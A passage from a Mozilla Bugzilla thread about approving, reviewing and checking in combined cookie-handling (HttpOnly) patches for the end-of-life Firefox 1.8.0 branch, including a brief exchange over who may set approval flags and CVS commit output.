a=asac for 1.8.0.15
(shipped unmodified by distros for some time)
Attachment #260254 -
Flags: approval1.8.0.15? → approval1.8.0.15+
Updated•17 years ago
|
Keywords: checkin-needed
Updated•17 years ago
|
Flags: blocking1.8.0.15+
Comment 146•17 years ago
|
||
Alexander, I don't see your name on the drivers list for Mozilla. Please read http://www.mozillazine.org/articles/article2779.html and don't set blocking or approval flags again.
Flags: blocking1.8.0.15+
Keywords: checkin-needed
Updated•17 years ago
|
Attachment #260254 -
Flags: approval1.8.0.15+ → approval1.8.0.15?
Comment 147•17 years ago
|
||
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
Wladimir, me and caillon do approvals for EOL 1.8.0 branch now.
Attachment #260254 -
Flags: approval1.8.0.15? → approval1.8.0.15+
Updated•17 years ago
|
Flags: blocking1.8.0.15+
Comment 148•17 years ago
|
||
(In reply to comment #146)
> Alexander, I don't see your name on the drivers list for Mozilla. Please read
> http://www.mozillazine.org/articles/article2779.html and don't set blocking or
> approval flags again.
asac (Debian/Ubuntu) and caillon (Red Hat) have taken over as drivers for the
1.8.0 branch from the normal Mozilla drivers, as that branch is no longer
supported by Mozilla. The Linux distros wanted to continue to maintain it, as
they still support these old packages, and it is just easier to use one repo
instead of every distro keeping track of backported packages.
Honestly, do you think we would allow anybody to grant one of the blocking or
approval flags? There are access checks in place, you know! ;)
Comment 149•17 years ago
|
||
(In reply to comment #148)
> There are access checks in place, you know! ;)
Oh, there are now? Good to know. Sorry, I didn't notice that this is about 1.8.0 branch.
Comment 150•17 years ago
|
||
if you land this on 1.8.0 branch, don't forget to also nominate and take the fix in bug 383181 (they should probably be merged as one patch at this point).
I was going to commit this, and the patch for 383181 but that build failed because it needed HttpOnly, which appears only available in the patch that has 1.8.1.4- on this bug. Looks like this was commited in one big "mega commit" that encompassed those two and a third bug http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&module=all&branch=MOZILLA_1_8_BRANCH&branchtype=match&dir=mozilla%2Fnetwerk%2Fcookie%2F&file=&filetype=match&who=&whotype=match&sortby=Date&hours=2&date=explicit&mindate=2007-07-10&maxdate=&cvsroot=%2Fcvsroot
Additionally, it caused https://bugzilla.mozilla.org/show_bug.cgi?id=384872 but I don't believe that's needed since session store didn't exist back then. Nonetheless, while the patches apply without change, I'd like a sanity check from you dwitte here to make sure we have all the needed bits for 1.8.0.15
Attachment #310505 -
Flags: review?(dwitte)
Updated•17 years ago
|
Attachment #310505 -
Attachment description: Combined patch → Combined patch for 1.8.0.x
Comment 152•17 years ago
|
||
Comment on attachment 310505 [details] [diff] [review]
Combined patch for 1.8.0.x
looks good; you do indeed want bug 387543 as well. those three bugs should do it.
r=dwitte
Attachment #310505 -
Flags: review?(dwitte) → review+
Comment on attachment 310505 [details] [diff] [review]
Combined patch for 1.8.0.x
Thanks for the quick comments. Carrying over a=asac for this.
Attachment #310505 -
Flags: approval1.8.0.15+
Checking in public/nsICookie2.idl;
/cvsroot/mozilla/netwerk/cookie/public/nsICookie2.idl,v <-- nsICookie2.idl
new revision: 1.3.66.1; previous revision: 1.3
done
Checking in src/nsCookie.cpp;
/cvsroot/mozilla/netwerk/cookie/src/nsCookie.cpp,v <-- nsCookie.cpp
new revision: 1.9.36.1; previous revision: 1.9
done
Checking in src/nsCookie.h;
/cvsroot/mozilla/netwerk/cookie/src/nsCookie.h,v <-- nsCookie.h
new revision: 1.11.36.1; previous revision: 1.11
done
Checking in src/nsCookieService.cpp;
/cvsroot/mozilla/netwerk/cookie/src/nsCookieService.cpp,v <-- nsCookieService.cpp
new revision: 1.43.8.1.2.3; previous revision: 1.43.8.1.2.2
done
Checking in src/nsCookieService.h;
/cvsroot/mozilla/netwerk/cookie/src/nsCookieService.h,v <-- nsCookieService.h
new revision: 1.17.30.1; previous revision: 1.17
done
Keywords: fixed1.8.0.15
You need to log in
before you can comment on or make changes to this bug.
Description
•